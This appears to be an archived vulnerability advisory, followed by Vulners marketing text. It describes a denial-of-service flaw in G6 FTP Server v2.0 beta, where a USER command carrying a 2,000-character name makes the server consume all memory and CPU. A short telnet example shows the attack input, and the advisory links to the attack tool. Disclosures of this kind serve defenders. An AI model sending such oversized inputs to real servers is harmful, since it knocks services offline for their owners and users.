`Remote D.o.S Attack in G6 FTP Server v2.0 (beta 4/5) Vulnerability
PROBLEM
UssrLabs found a Local/Remote DoS Attack in G6 FTP Server v2.0 (beta 4/5),
the buffer overflow is caused by a long user name, 2000 characters.
the G6FTP start to do infinites loops in the main program,and start eating
all memory and all computer resource CPU 100%, at the moment of no more
memory, if this happend ALL System is down :(
Example:
[gimmemore@itsme]$ telnet example.com 21
Trying example.com...
Connected to example.com.
Escape character is '^]'.
220-G6 FTP Server v2.0 (beta 5) ready ...
USER {buffer)
Binary/Source for this D.O.S:
http://www.ussrback.com/g6ftp/
Where buffer is 2000 characters.
Vendor Status:
Not Contacted
Vendor Url: http://www.gene6.com/
Program Url: http://www.gene6.com/g6ftpd/download.html
Credit: USSRLABS
SOLUTION
Nothing yet.
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h
http://WWW.USSRBACK.COM
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation